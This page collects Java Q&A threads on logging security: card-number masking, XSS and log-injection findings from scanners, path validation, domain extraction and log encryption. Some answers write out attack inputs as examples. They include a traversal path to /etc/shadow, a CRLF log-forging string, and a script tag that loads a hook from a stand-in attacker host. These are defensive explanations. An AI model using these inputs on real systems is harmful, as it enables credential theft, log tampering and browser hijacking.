How to mask credit card numbers in log files with Log4J?

Our web app needs to be made PCI compliant, i.e. it must not store any credit card numbers. The app is a frontend to a mainframe system which handles the CC numbers internally and - as we have just found out - occasionally still spits out a full CC number on one of its response screens. By default, the whole content of these responses is logged at debug level, and the content parsed from them can also be logged in lots of different places. So I can't hunt down every source of such data leaks; I must make sure that CC numbers are masked in our log files.
The regex part is not an issue; I will reuse the regex we already use in several other places. However, I just can't find any good source on how to alter a part of a log message with Log4J. Filters seem to be much more limited: they can only decide whether to log a particular event or not, but can't alter the content of the message. I also found the ESAPI security wrapper API for Log4J, which at first sight promises to do what I want. However, apparently I would need to replace all the loggers in the code with the ESAPI logger class - a pain in the butt. I would prefer a more transparent solution.
Any idea how to mask out credit card numbers from Log4J output?
Update: Based on @pgras's original idea, here is a working solution:
public class CardNumberFilteringLayout extends PatternLayout {
    private static final String MASK = "$1++++++++++++";
    private static final Pattern PATTERN = Pattern.compile("([0-9]{4})([0-9]{9,15})");

    @Override
    public String format(LoggingEvent event) {
        if (event.getMessage() instanceof String) {
            String message = event.getRenderedMessage();
            Matcher matcher = PATTERN.matcher(message);
            if (matcher.find()) {
                String maskedMessage = matcher.replaceAll(MASK);
                @SuppressWarnings({ "ThrowableResultOfMethodCallIgnored" })
                Throwable throwable = event.getThrowableInformation() != null ?
                        event.getThrowableInformation().getThrowable() : null;
                LoggingEvent maskedEvent = new LoggingEvent(event.fqnOfCategoryClass,
                        Logger.getLogger(event.getLoggerName()), event.timeStamp,
                        event.getLevel(), maskedMessage, throwable);
                return super.format(maskedEvent);
            }
        }
        return super.format(event);
    }
}
Notes:
I mask with + rather than *, because I want to tell apart cases when the CID was masked by this logger, from cases when it was done by the backend server, or whoever else
I use a simplistic regex because I am not worried about false positives
The code is unit tested so I am fairly convinced it works properly. Of course, if you spot any possibility to improve it, please let me know :-)

You could write your own layout and configure it for all appenders...
Layout has a format method which makes a String from a loggingEvent that contains the logging message...

A better implementation of credit card number masking is at http://adamcaudill.com/2011/10/20/masking-credit-cards-for-pci/ .
You want to log the issuer and the checksum, but not the PAN (Primary Account Number).
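As a rough illustration of that advice, here is a minimal sketch that keeps the first six digits (the issuer prefix) and the last four digits and masks everything in between. The class name PanMasker, the method name mask and the simplistic 13-19 digit pattern are assumptions made for this example; it performs no Luhn check and is not taken from the linked article.

```java
import java.util.Arrays;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper, not part of Log4J: masks the middle digits of anything
// that looks like a 13-19 digit card number, keeping the first six and last four.
final class PanMasker {
    // Simplistic pattern: 6 leading digits, 3-9 middle digits, 4 trailing digits.
    private static final Pattern PAN =
            Pattern.compile("\\b(\\d{6})(\\d{3,9})(\\d{4})\\b");

    static String mask(String message) {
        Matcher m = PAN.matcher(message);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            // One '*' per masked digit, so the original length stays visible.
            char[] stars = new char[m.group(2).length()];
            Arrays.fill(stars, '*');
            m.appendReplacement(out, m.group(1) + new String(stars) + m.group(3));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // prints "card 411111******1111 declined"
        System.out.println(mask("card 4111111111111111 declined"));
    }
}
```

Such a method could be called from a custom layout's format method in place of a plain replaceAll.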

Related

Sanitize/validate variable to avoid cross-site-scripting attack

I get this issue with CheckMarx security scan:
Method exec at line 69 of
web\src\main\java\abc\web\actions\HomeAction.java gets user input for
the CNF_KEY_COSN element. This element’s value then flows through the
code without being properly sanitized or validated and is eventually
displayed to the user in method logException at line 905 of
web\src\main\java\gov\abc\external\info\ServiceHelper.java. This may
enable a Cross-Site-Scripting attack.
Line 69 of HomeAction.java:
String cosn = (String) request.getParameter(CNF_KEY_CON);
Line 905 in ServiceHelper.java just logs the error:
private static void logException(InfoServiceException exception, String message) {
String newMessage = message + ": " + exception.getMessageForLogging();
try {
log.error(newMessage, exception);
} catch (Exception e) {
// fallback to console
System.out.println("error logging exception ->");
e.printStackTrace(System.out);
System.out.println("exception ->");
System.out.print(newMessage);
if (exception != null) exception.printStackTrace(System.out);
}
}
Changed another block of code in HomeAction.java to:
if(cosn!= null && cosn.matches("[0-9a-zA-Z_]+")) {
...
}
But that didn't help. How do I validate/sanitize/encode Line 69. Any help is much appreciated.
Thanks

You can sanitise strings against XSS attacks using Jsoup, which has a clean() method for this. You would do something like this to sanitise the input:
String sanitizedInput = Jsoup.clean(originalInput, "", Whitelist.none(), new OutputSettings().prettyPrint(false));

Checkmarx defines a set of sanitizers that you can check in the system.
Based on your source code snippets, I assume that:
i) you are appending 'cosn' to 'message'
ii) the application is web-based in nature (in view of the request.getParameter)
iii) the message is being displayed on the console or logged to a file.
You could consider using Google Guava or Apache Commons Text to HTML-escape the input.
import com.google.common.html.HtmlEscapers;
public void testGuavaHtmlEscapers(){
String badInput = "<script> alert me! <script>";
String escapedLocation = HtmlEscapers.htmlEscaper().escape(badInput);
System.out.println("<h1> Location: " + escapedLocation + "<h1>");
}
import static org.apache.commons.text.StringEscapeUtils.escapeHtml4;
public void testHtmlEscapers(){
String badInput = "<script> alert me! <script>";
System.out.println(escapeHtml4(badInput));
}
I would also consider whether there is sensitive information that I should mask, e.g. using String.replaceAll.
public void testReplace(){
    String email = "some-email@domail.com";
    String masked = email.replaceAll("(?<=.).(?=[^@]*?.@)", "*");
    System.out.println(masked);
}
The three sanitization methods above work similarly.

This is likely a false positive (technically, "not exploitable" in Checkmarx) with regard to XSS, depending on how you process and display logs. If logs are ever displayed in a browser as HTML, it might be vulnerable to blind XSS from this application's point of view, but it would be a vulnerability in whatever component displays logs as HTML, and not in the code above.
Contrary to other answers, you should not encode the message here. Whatever technology you use for logging will of course have to encode it properly for its own use (like for example if it's stored as JSON, data will have to be JSON-encoded), but that has nothing to do with XSS, or with this problem at all.
This is just raw data, and you can store raw data as is. If you encode it here, you will have a hard time displaying it in any other way. For example if you apply html encoding, you can only display it in html (or you have to decode, which will negate any effect). It doesn't make sense. XSS would arise if you displayed these logs in a browser - in which case whatever displays it would have to encode it properly, but that's not the case here.
Note though that it can still be a log injection vulnerability. Make sure that whatever way you store logs, that log store does apply the necessary encoding. If it's a text file, you probably want to remove newlines so that fake lines cannot be added to the log. If it's JSON, you will want to encode to JSON, and so on. But that's a feature of your log facility, and not the code above.
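For the plain text file case, neutralizing newlines could look roughly like the sketch below. The class LogSanitizer and the choice of '_' as the replacement character are assumptions for illustration; ideally this lives in the logging layer (layout or appender) rather than at each call site.

```java
// Hypothetical helper: replaces carriage returns and line feeds so that
// user-controlled input cannot start a forged line in a text log file.
final class LogSanitizer {
    static String neutralize(String userInput) {
        if (userInput == null) {
            return "null";
        }
        // Each CR and LF becomes a visible placeholder character.
        return userInput.replace('\r', '_').replace('\n', '_');
    }

    public static void main(String[] args) {
        String forged = "bob\r\n2024-01-01 INFO login ok for admin";
        System.out.println("login failed for " + neutralize(forged));
    }
}
```

The data itself stays otherwise raw, which keeps it displayable in any other context later.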

In Java, how do I extract the domain of a URL?

I'm using Java 8. I want to extract the domain portion of a URL. Just in case I'm using the word "domain" incorrectly, what I want is: if my server name is
test.javabits.com
I want to extract "javabits.com". Similarly, if my server name is
firstpart.secondpart.lastpart.org
I want to extract "lastpart.org". I tried the below
final String domain = request.getServerName().replaceAll(".*\\.(?=.*\\.)", "");
but it's not extracting the domain properly. Then I tried what this guy has on his site -- https://www.mkyong.com/regular-expressions/domain-name-regular-expression-example/, e.g.
private static final String DOMAIN_NAME_PATTERN = "^((?!-)[A-Za-z0-9-]{1,63}(?<!-)\\.)+[A-Za-z]{2,6}$";
but that is also not extracting what I want. How can I extract the domain name portion properly?

Summary: Do not use regex for this. Use whois.
If I try to extrapolate from your question, to find out what you really want to do, I guess you want to find the domain belonging to some non-infrastructural owner from the host part of a URL. Additionally, from the tag of your question, you want to do it with the help of a regex.
The task you are undertaking is at best impractical, but probably impossible.
There are a number of corner cases that you would have to weed out. Apart from the list of infrastructural domains kindly provided by Lennart in https://publicsuffix.org/list/public_suffix_list.dat, you also have the cases of an empty host field in the URL or an IP-address forming the host part.
So, is there a better approach to this? Of course there is. What you do want to do is query a public database for the data you need. The protocol for such queries is called WHOIS.
Apache Commons Net provides an easy way to access WHOIS information through the WhoisClient class. From there you can query the domain field, and find some more information that may be useful to you.
It shouldn't be harder than
import org.apache.commons.net.whois.WhoisClient;
import java.io.IOException;

public class CommonsTest {
    public static void main(String[] args) {
        WhoisClient c = new WhoisClient();
        try {
            c.connect(WhoisClient.DEFAULT_HOST);
            // URL is the domain to look up; it is not defined in this snippet
            System.out.println(c.query(URL));
            c.disconnect();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Using this will get you the whois information about the domain you are asking for. If the domain is unregistered, that is, is a private domain, as in the case of www.stackexchange.com, you will get an error saying no domain is registered. Remove the first part of the address and try again. Once you have found the registered domain, you will also find the registrar and the registrant.
Now, unfortunately, whois is not as simple as one would think. Read further on https://manpages.debian.org/jessie/whois/whois.1.en.html for an elaboration on how to use it and what information you can expect from different sources.
Also, check related questions here.

Try it like this:
String[] parts = longDomain.split("\\.");
String domain = parts[parts.length - 2] + "." + parts[parts.length - 1];
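A slightly more defensive version of the same idea is sketched below. The class DomainExtractor and method lastTwoLabels are hypothetical names. Note the stated limitations: it simply keeps the last two dot-separated labels, so it gives wrong answers for IP addresses and for multi-label public suffixes such as co.uk.

```java
// Hypothetical helper: returns the last two dot-separated labels of a host name.
final class DomainExtractor {
    static String lastTwoLabels(String host) {
        // String.split takes a regex, so the dot has to be escaped.
        String[] parts = host.split("\\.");
        if (parts.length < 2) {
            return host; // e.g. "localhost": nothing to strip
        }
        return parts[parts.length - 2] + "." + parts[parts.length - 1];
    }

    public static void main(String[] args) {
        System.out.println(lastTwoLabels("test.javabits.com"));
        System.out.println(lastTwoLabels("firstpart.secondpart.lastpart.org"));
    }
}
```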

How to resolve External Control of File Name or Path (CWE ID 73)

I am working on fixing Veracode issues in my application. Veracode has highlighted the flaw "External Control of File Name or Path (CWE ID 73) " in below code.
Thread.currentThread().getContextClassLoader().getResourceAsStream(lookupName)
How do I validate the parameter? If I need to use below ESAPI validation, then what is the exact parameter I should be passing in getValidFileName() method. Currently I am passing the parameters as below.
ESAPI.validator().getValidFileName(lookupName, lookupName,
ESAPI.securityConfiguration().getAllowedFileExtensions(), false);
Correct me whether I am following the right approach for fixing this issue.

There are several suggestions at: https://community.veracode.com/s/article/how-do-i-fix-cwe-73-external-control-of-file-name-or-path-in-java
You can use hardcoded values, if these files are stored in the server side.
(i.e.: in a HashMap).
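The hardcoded-values idea could be sketched as follows: the request parameter is only ever used as a key into a fixed map, and the value passed on to getResourceAsStream comes from the map, never from the user. The class name ResourceAllowList and the two map entries are made up for illustration, and whether a given scanner accepts this as a fix is not guaranteed.

```java
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

// Hypothetical allow-list: maps externally supplied keys to fixed resource names.
final class ResourceAllowList {
    private static final Map<String, String> RESOURCES;
    static {
        Map<String, String> m = new HashMap<>();
        m.put("countries", "lookup/countries.properties");   // example entry
        m.put("currencies", "lookup/currencies.properties"); // example entry
        RESOURCES = Collections.unmodifiableMap(m);
    }

    // Returns the hardcoded resource name, or empty if the key is unknown or null.
    static Optional<String> resolve(String lookupName) {
        return Optional.ofNullable(lookupName).map(RESOURCES::get);
    }

    public static void main(String[] args) {
        System.out.println(resolve("countries").isPresent());
        System.out.println(resolve("../../etc/shadow").isPresent());
    }
}
```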
Another solution is to use a custom validator (from veracode page) :
// GOOD Code
String extension = request.getParameter("extension");
File f = new File(buildValidAvatarPath(extension));

@FilePathCleanser
public String buildValidAvatarPath(String requestedExtension) {
    String[] allowedExtensions = new String[]{"jpg", "gif", "png"};
    String extension = "png"; // Default extension
    for (String allowedExtension : allowedExtensions) {
        if (allowedExtension.equals(requestedExtension)) {
            // Use the allow-listed constant, not the user-supplied value
            extension = allowedExtension;
        }
    }
    String path = configPath + "avatar." + extension;
    // See "Note on authorization"
    User user = getCurrentUser();
    if (!userMayAccessFile(user, path)) {
        throw new AuthorizationException("User may not access this file", user);
    }
    return path;
}

Okay, so the problem is that you are allowing user control of that file path. Imagine it's on a UNIX box and they enter:
../../../../../../../etc/shadow
Whatever privileges are granted to the account running that Java thread can potentially be exposed to the user in question. I don't know what processing is going on in your application, but the danger is real: you need to prevent user control of that lookup variable.
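For file system paths, one common way to reject input like the traversal string above is to resolve it against a fixed base directory, normalize it, and check that the result is still inside that base. The sketch below assumes a hypothetical helper SafePaths.resolveInside; it does not follow symbolic links (toRealPath would be needed for that) and is not an ESAPI API.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical helper: resolves user input against a base directory and
// refuses anything that would end up outside of it.
final class SafePaths {
    static Path resolveInside(Path baseDir, String userSupplied) {
        Path base = baseDir.toAbsolutePath().normalize();
        // normalize() collapses "." and ".." segments before the containment check.
        Path candidate = base.resolve(userSupplied).normalize();
        if (!candidate.startsWith(base)) {
            throw new IllegalArgumentException("Path escapes base directory");
        }
        return candidate;
    }

    public static void main(String[] args) {
        System.out.println(resolveInside(Paths.get("data"), "reports/a.txt"));
        try {
            resolveInside(Paths.get("data"), "../../../etc/shadow");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```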
The call you're making is consistent with the single test in ValidatorTest.java, which is definitely a deficiency in code coverage on our behalf.
Now, there's an excellent chance that even if you use this call that Veracode might still flag it: the default file list in ESAPI.properties will need to be either truncated for your use case, or you'll have to create your own Validator rule for legal file extensions for your specific use case.
Which brings up the next bit: There's a lot of mischief that can happen in regards to file uploads.
In short, to be actually secure about file uploads will require more than what ESAPI currently offers, which is unfortunately, only an extension check. In your particular case, make sure you try some directory traversal attacks. And use that OWASP link to help analyze your application.
Given that the OP wants to clear the issue in Veracode, you would want to chain a couple calls:
ESAPI.validator().getValidDirectoryPath() and ESAPI.validator().getValidFileName()
But be sure you've properly truncated the extension list in HttpUtilities.ApprovedUploadExtensions in validator.properties as the default list is too permissive, at least until we release 2.1.0.2.
I have to stress however that even with this particular combination there is absolutely nothing ESAPI does to prevent a user from renaming "netcat.exe" to "puppies.xlsx" and bypassing your validation check, that's why the rant on the first part of this answer.
ESAPI's file validation is NOT secure, it's quite simply better than nothing at all.
Doing this correctly requires more work than just using 1-2 calls to ESAPI.
DISCLAIMER: as of this writing I am the project co-lead for ESAPI.

You can sanitize the file name as in the code snippet below:
private static String sanitizeFileName(String name) {
return name
.chars()
.mapToObj(i -> (char) i)
.map(c -> Character.isWhitespace(c) ? '_' : c)
.filter(c -> Character.isLetterOrDigit(c) || c == '-' || c == '_' || c == ':')
.map(String::valueOf)
.collect(Collectors.joining());
}

How to fix Veracode CWE 117 (Improper Output Neutralization for Logs)

There is a Spring global @ExceptionHandler(Exception.class) method which logs exceptions like this:
@ExceptionHandler(Exception.class)
void handleException(Exception ex) {
logger.error("Simple error message", ex);
...
The Veracode scan says that this logging has Improper Output Neutralization for Logs and suggests using the ESAPI logger. Is there any way to fix this vulnerability without changing the logger to ESAPI? This is the only place in the code where I faced this issue, and I am trying to figure out how to fix it with minimal changes. Maybe ESAPI has some methods I haven't noticed?
P.S. Current logger is Log4j over slf4j
UPD:
In the end I used ESAPI logger. I thought it wouldn't use my default logging service, but I was wrong and it simply used my slf4j logger interface with appropriate configuration.
private static final Logger logger = ESAPI.getLogger(MyClass.class);
...
logger.error(null, "Simple error message", ex);
ESAPI has extension of log4j logger and logger factory. It can be configured what to use in ESAPI.properties. For example:
ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory

Is there any way how to fix this vulnerability without changing
logger to ESAPI?
In short, yes.
TLDR:
First understand the gravity of the error. The main concern is falsified log statements. Say you had code like this:
log.error( transactionId + " for user " + username + " was unsuccessful.");
If either variable is under user control, an attacker can inject false logging statements by using inputs like \r\n for user foobar was successful\r\n, thus allowing them to falsify the log and cover their tracks. (Well, in this contrived case, just make it a little harder to see what happened.)
The second method of attack is more of a chess move. Many logs are HTML formatted to be viewed in another program; for this example, we'll pretend the logs are meant to be HTML files viewed in a browser. Now we inject <script src="https://evilsite.com/hook.js" type="text/javascript"></script> and you will have hooked a browser with an exploitation framework that's most likely executing as a server admin... because it's doubtful that the CEO is going to be reading the log. Now the real hack can begin.
Defenses:
A simple defense is to make sure that all log statements containing user input escape the characters '\n' and '\r' with something obvious, like '֎', or you can do what ESAPI does and escape with the underscore. It really doesn't matter as long as it's consistent; just keep in mind not to use character sets that would confuse you in the log. Something like userInput.replaceAll("\r", "֎").replaceAll("\n", "֎");
I also find it useful to make sure that log formats are exquisitely specified... meaning that you make sure you have a strict standard for what log statements need to look like and construct your formatting so that catching a malicious user is easier. All programmers must submit to the party and follow the format!
To defend against the HTML scenario, I would use the [OWASP encoder project][1]
As to why ESAPI's implementation is suggested, it is a very battle-tested library, but in a nutshell, this is essentially what we do. See the code:
/**
* Log the message after optionally encoding any special characters that might be dangerous when viewed
* by an HTML based log viewer. Also encode any carriage returns and line feeds to prevent log
* injection attacks. This logs all the supplied parameters plus the user ID, user's source IP, a logging
* specific session ID, and the current date/time.
*
* It will only log the message if the current logging level is enabled, otherwise it will
* discard the message.
*
* @param level defines the set of recognized logging levels (TRACE, INFO, DEBUG, WARNING, ERROR, FATAL)
* @param type the type of the event (SECURITY SUCCESS, SECURITY FAILURE, EVENT SUCCESS, EVENT FAILURE)
* @param message the message to be logged
* @param throwable the {@code Throwable} from which to generate an exception stack trace.
*/
private void log(Level level, EventType type, String message, Throwable throwable) {
// Check to see if we need to log.
if (!isEnabledFor(level)) {
return;
}
// ensure there's something to log
if (message == null) {
message = "";
}
// ensure no CRLF injection into logs for forging records
String clean = message.replace('\n', '_').replace('\r', '_');
if (ESAPI.securityConfiguration().getLogEncodingRequired()) {
clean = ESAPI.encoder().encodeForHTML(message);
if (!message.equals(clean)) {
clean += " (Encoded)";
}
}
// log server, port, app name, module name -- server:80/app/module
StringBuilder appInfo = new StringBuilder();
if (ESAPI.currentRequest() != null && logServerIP) {
appInfo.append(ESAPI.currentRequest().getLocalAddr()).append(":").append(ESAPI.currentRequest().getLocalPort());
}
if (logAppName) {
appInfo.append("/").append(applicationName);
}
appInfo.append("/").append(getName());
//get the type text if it exists
String typeInfo = "";
if (type != null) {
typeInfo += type + " ";
}
// log the message
// Fix for https://code.google.com/p/owasp-esapi-java/issues/detail?id=268
// need to pass callerFQCN so the log is not generated as if it were always generated from this wrapper class
log(Log4JLogger.class.getName(), level, "[" + typeInfo + getUserInfo() + " -> " + appInfo + "] " + clean, throwable);
}
See lines 398-453. That's all the escaping that ESAPI provides. I would suggest copying the unit tests as well.
[DISCLAIMER]: I am project co-lead on ESAPI.
[1]: https://www.owasp.org/index.php/OWASP_Java_Encoder_Project and make sure your inputs are properly encoded when going into logging statements--every bit as much as when you're sending input back to the user.

I am new to Veracode and was facing CWE-117. I understood that Veracode raises this error when your logger statement could be attacked through malicious parameter values passed in a request. So we need to remove \r and \n (CRLF) from variables that are used in the logger statement.
Most newcomers will wonder what method should be used to remove CRLF from a variable passed to a logger statement. Also, sometimes replaceAll() will not work because it is not a method approved by Veracode. Therefore, here is the link to the methods approved by Veracode for handling CWE problems.
[Link Expired #22.11.2022] https://help.veracode.com/reader/4EKhlLSMHm5jC8P8j3XccQ/IiF_rOE79ANbwnZwreSPGA
In my case I have used org.springframework.web.util.HtmlUtils.htmlEscape mentioned in the above link and it resolved the problem.
private static final Logger LOG = LoggerFactory.getLogger(MemberController.class);
//problematic logger statement
LOG.info("brand {}, country {}",brand,country);
//Correct logger statement
LOG.info("brand {}, country {}",org.springframework.web.util.HtmlUtils.htmlEscape(brand),org.springframework.web.util.HtmlUtils.htmlEscape(country));
Edit-1: Veracode has stopped suggesting any particular function/method for sanitizing the logger variable. However, the above solution will still work. The link below, suggested by Veracode, explains what to do and how to do it to fix CWE-117 for some languages.
https://community.veracode.com/s/article/How-to-Fix-CWE-117-Improper-Output-Neutralization-for-Logs
JAVA: Using ESAPI library from OWASP for the logger. Checkout more details in link https://www.veracode.com/security/java/cwe-117

If you are using Logback use the replace function in your logback config pattern
original pattern
<pattern>%d %level %logger : %msg%n</pattern>
with replace
<pattern>%d %level %logger : %replace(%msg){'[\r\n]', '_'} %n</pattern>
if you want to strip <script> tag as well
<pattern>%d %-5level %logger : %replace(%msg){'[\r\n]|<script', '_'} %n</pattern>
This way you don't need to modify individual log statements.

Though I am a bit late, I think this will help those who do not want to use the ESAPI library and face the issue only in an exception handler class.
Use the Apache Commons Lang library:
import org.apache.commons.lang3.exception.ExceptionUtils;
LOG.error(ExceptionUtils.getStackTrace(ex));

In order to avoid the Veracode CWE 117 vulnerability, I have used a custom logger class which uses the HtmlUtils.htmlEscape() function to mitigate the vulnerability.
The solution recommended by Veracode is to use ESAPI loggers, but if you don't want to add an extra dependency to your project, this should work fine.
https://github.com/divyashree11/VeracodeFixesJava/blob/master/spring-annotation-logs-demo/src/main/java/com/spring/demo/util/CustomLogger.java

I have tried htmlEscape of org.springframework.web.util.HtmlUtils, but it did not resolve my Veracode vulnerability. Give the solution below a try.
For Java use:
StringEscapeUtils.escapeJava(str)
For Html/JSP use:
StringEscapeUtils.escapeHtml(str)
Please use the package below:
import org.apache.commons.lang.StringEscapeUtils;

Encrypted logger for Java

I'll put the question upfront:
Is there a logger available in Java that does encryption(preferably 128-bit AES or better)?
I've done a lot of searching for this over the last couple of days. There's a few common themes to what I've found:
Dissecting information between log4j and log4j2 is giving me headaches(but mostly unrelated to the task at hand)
Most threads are dated, including the ones here on SO. This one is probably the best I've found on SO, and one of the newer answers links to a roll-your-own version.
The most common answer is "roll-your-own", but these answers are also a few years old at this point.
A lot of people question why I or anyone would do this in Java anyway, since it's simple enough to analyze Java code even without the source.
For the last point, it's pretty much a moot point for my project. We also use a code obfuscator and could employ other obfuscation techniques. The point of using encryption is simply to raise the bar of figuring out our logs above "trivially easy", even if it's only raised to "mildly time-consuming". A slightly relevant aside - the kind of logging we're going to encrypt is intended merely for alpha/beta, and will likely only include debug, warn, and error levels of logging(so the number of messages to encrypt should be fairly low).
The best I've found for Log4j2 is in their documentation:
KeyProviders
Some components within Log4j may provide the ability to perform data encryption. These components require a secret key to perform the encryption. Applications may provide the key by creating a class that implements the SecretKeyProvider interface.
But I haven't really found anything other than wispy statements along the lines of 'plug-ins are able of doing encryption'. I haven't found a plug-in that actually has that capability.
I have also just started trying to find other loggers for Java to see if they have one implemented, but nothing is really jumping out for searches like 'java logging encryption'.

Basically, log encryption is not best practice; there are only limited situations where you need this functionality. The people who have access to the logs mostly also have access to the JVM, and in the JVM all log messages are at least generated as Strings, so even if you encrypt them in the log file or console, the real values will be available in the JVM string pool. If anyone ever needs to hack your logs, it will be as easy as looking in the string pool.
But anyway, if you need a way to encrypt the logs, and since there is no generic way to do this, the best way in my opinion is to go with AspectJ. This will have minimal impact on your sources: you write code as you did before, but the logs will be encrypted. Following is simple application code which will encrypt all the logs from all the compiled sources, using AspectJ, Slf4j as the logging facade and Log4j2 as the logging implementation.
The simple class which logs the "Hello World"
public class Main {
private static final transient Logger LOG = LoggerFactory
.getLogger(Main.class);
public static void main(String[] args) {
LOG.info("Hello World");
LOG.info("Hello {0}", "World 2");
}
}
Aspect which encrypts (in this case just edits the text)
@Aspect
public class LogEncryptAspect {
@Around("call(* org.slf4j.Logger.info(..))")
public Object encryptLog (ProceedingJoinPoint thisJoinPoint) throws Throwable{
Object[] arguments = thisJoinPoint.getArgs();
if(arguments[0] instanceof String){
String encryptedLog = encryptLogMessage ((String) arguments[0], arguments.length > 1 ? Arrays.copyOfRange(arguments, 1, arguments.length) : null);
arguments[0] = encryptedLog;
}
return thisJoinPoint.proceed(arguments);
}
// TODO change this to apply some kind of encryption
public final String encryptLogMessage (String message, Object... args){
if(args != null){
return MessageFormat.format(message, args) + " encrypted";
}
return message + " encrypted";
}
}
The output is :
[main] INFO xxx.Main - Hello World encrypted
[main] INFO xxx.Main - Hello World 2 encrypted
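To replace the TODO placeholder with real encryption, one option is AES in GCM mode from the standard javax.crypto API, with a 128-bit key as asked for in the question. The sketch below is only an assumption about how that step might look: the class LogCrypto and its method names are hypothetical, the key is generated in memory, and key storage and distribution (the hard part in practice) are left out entirely.

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Base64;

// Hypothetical helper: encrypts one log message with AES-128 in GCM mode and
// returns Base64 text (IV followed by ciphertext) that fits on a single log line.
final class LogCrypto {
    private static final int IV_BYTES = 12;   // IV length commonly used with GCM
    private static final int TAG_BITS = 128;  // authentication tag length
    private static final SecureRandom RANDOM = new SecureRandom();

    static SecretKey newKey() throws GeneralSecurityException {
        KeyGenerator gen = KeyGenerator.getInstance("AES");
        gen.init(128);
        return gen.generateKey();
    }

    static String encrypt(SecretKey key, String message) throws GeneralSecurityException {
        byte[] iv = new byte[IV_BYTES];
        RANDOM.nextBytes(iv); // a fresh random IV for every message
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        byte[] ct = cipher.doFinal(message.getBytes(StandardCharsets.UTF_8));
        byte[] out = ByteBuffer.allocate(iv.length + ct.length).put(iv).put(ct).array();
        return Base64.getEncoder().encodeToString(out);
    }

    static String decrypt(SecretKey key, String encoded) throws GeneralSecurityException {
        byte[] in = Base64.getDecoder().decode(encoded);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        // The first IV_BYTES bytes of the decoded data are the IV.
        cipher.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, in, 0, IV_BYTES));
        byte[] pt = cipher.doFinal(in, IV_BYTES, in.length - IV_BYTES);
        return new String(pt, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws GeneralSecurityException {
        SecretKey key = newKey();
        String line = encrypt(key, "Hello World");
        System.out.println(line);
        System.out.println(decrypt(key, line));
    }
}
```

In the aspect above, encryptLogMessage could call such an encrypt method on the formatted message instead of appending " encrypted".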
